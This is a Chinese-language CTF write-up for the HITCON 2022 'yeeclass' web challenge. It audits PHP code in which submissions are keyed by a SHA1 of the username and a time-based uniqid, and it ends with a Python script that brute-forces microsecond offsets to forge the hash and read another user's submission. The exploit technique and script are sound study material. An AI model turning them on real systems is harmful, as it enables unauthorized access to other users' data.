2022-HitCon-Web-yeeclass WP-Toy模板网

这篇具有很好参考价值的文章主要介绍了2022-HitCon-Web-yeeclass WP。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

复现平台CTFHUB
靶机为一个完整类论坛网页，题目给了服务端完整代码

代码审计

/src/submit.php Line56-63:
2022-HitCon-Web-yeeclass WP,php,web安全,mysql
可以看到提交数据存入的时候将$_SESSION["username"]."_"作为前缀，生成了一个uniqid。uniqid的生成方式即{sec:08x}{usec:05x}

/src/submission.php Line5-15:

2022-HitCon-Web-yeeclass WP,php,web安全,mysql 在该查询界面中首选了hash参数作为查询方式，
意味着如果获得存入数据库的时间和username即可模拟出hash从而读取flag

/src/submission.php Line16-44:
2022-HitCon-Web-yeeclass WP,php,web安全,mysql

允许了通过homeworkid查询入库时间和username

解题

在没有登录没有session访问challenge-xxxx.sandbox.ctfhub.com:10800/submission.php?homeworkid=1得到提交时间和username

而入库时间和uniqid由于运行效率，会存在微秒时间差，因而需要爆破该时间差

exp

import requests
import hashlib
from datetime import datetime, timezone

username = "flagholder"
timestamp = '2022-12-26 20:59:48.231534'

dt = datetime.fromisoformat(timestamp)#.replace(tzinfo=timezone.utc)
sec = int(dt.timestamp())
usec = dt.microsecond
print(sec, usec)

url = 'http://challenge-xxxx.sandbox.ctfhub.com:10800/submission.php?hash='

def get_hash(sec, usec):
    user_id = f"{username}_{sec:08x}{usec:05x}"
    return hashlib.sha1(user_id.encode()).hexdigest()

for i in range(0, 1000):
    hash = get_hash(sec, usec - i)
    r = requests.get(url + hash)
    print(i, hash)
    if r.text != "Submission not found.":
        print("Found hash:", hash)
        print(r.text)
        break